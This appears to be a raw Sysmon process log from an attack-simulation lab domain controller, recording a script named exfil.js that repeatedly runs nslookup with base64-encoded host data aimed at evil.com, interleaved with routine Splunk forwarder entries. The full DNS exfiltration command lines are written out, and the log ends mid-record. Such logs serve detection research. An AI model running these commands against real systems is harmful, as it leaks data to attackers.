154100x800000000000000073383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:51.974{A8622C2F-5BB3-6078-590F-00000000AE01}6076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BB3-6078-570F-00000000AE01}2584C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmucmk.tmp 2>&1 154100x800000000000000073372Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:51.945{A8622C2F-5BB3-6078-570F-00000000AE01}2584C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmucmk.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000073321Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:39.534{A8622C2F-5BA7-6078-560F-00000000AE01}5976C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5BA7-6078-540F-00000000AE01}4376C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnutw.tmp 2>&1 154100x800000000000000073310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:39.505{A8622C2F-5BA7-6078-540F-00000000AE01}4376C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnutw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073239Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:22.217{A8622C2F-5B96-6078-530F-00000000AE01}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073230Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:21.882{A8622C2F-5B95-6078-520F-00000000AE01}636C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B95-6078-500F-00000000AE01}1348C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlledqwr.tmp 2>&1 154100x800000000000000073218Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:21.854{A8622C2F-5B95-6078-500F-00000000AE01}1348C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlledqwr.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000073205Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:20.647{A8622C2F-5B94-6078-4F0F-00000000AE01}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073192Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:19.965{A8622C2F-5B93-6078-4E0F-00000000AE01}6868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073182Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:19.303{A8622C2F-5B93-6078-4D0F-00000000AE01}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073158Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:17.564{A8622C2F-5B91-6078-4C0F-00000000AE01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073147Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:16.897{A8622C2F-5B90-6078-4B0F-00000000AE01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073138Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:16.215{A8622C2F-5B90-6078-4A0F-00000000AE01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000073110Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:09.450{A8622C2F-5B89-6078-490F-00000000AE01}3912C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B89-6078-470F-00000000AE01}6268C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlptybq.tmp 2>&1 154100x800000000000000073099Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:28:09.420{A8622C2F-5B89-6078-470F-00000000AE01}6268C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlptybq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000073033Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:51.798{A8622C2F-5B77-6078-460F-00000000AE01}4244C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B77-6078-440F-00000000AE01}920C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaood.tmp 2>&1 154100x800000000000000073022Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:51.768{A8622C2F-5B77-6078-440F-00000000AE01}920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaood.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000072973Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:39.365{A8622C2F-5B6B-6078-430F-00000000AE01}6660C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B6B-6078-410F-00000000AE01}5212C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlihmz.tmp 2>&1 154100x800000000000000072962Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:39.336{A8622C2F-5B6B-6078-410F-00000000AE01}5212C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlihmz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072897Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:22.211{A8622C2F-5B5A-6078-400F-00000000AE01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072889Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:21.688{A8622C2F-5B59-6078-3F0F-00000000AE01}5664C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B59-6078-3D0F-00000000AE01}6516C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsio.tmp 2>&1 154100x800000000000000072878Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:21.659{A8622C2F-5B59-6078-3D0F-00000000AE01}6516C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsio.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000072866Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:20.590{A8622C2F-5B58-6078-3C0F-00000000AE01}1348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072854Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:19.965{A8622C2F-5B57-6078-3B0F-00000000AE01}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072826Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:19.296{A8622C2F-5B57-6078-3A0F-00000000AE01}1796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072799Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:17.468{A8622C2F-5B55-6078-390F-00000000AE01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072788Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:16.894{A8622C2F-5B54-6078-380F-00000000AE01}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072779Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:16.212{A8622C2F-5B54-6078-370F-00000000AE01}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072747Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:09.294{A8622C2F-5B4D-6078-360F-00000000AE01}5344C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B4D-6078-340F-00000000AE01}6868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloavjlz.tmp 2>&1 154100x800000000000000072734Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:27:09.264{A8622C2F-5B4D-6078-340F-00000000AE01}6868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloavjlz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072628Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:51.600{A8622C2F-5B3B-6078-330F-00000000AE01}7044C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 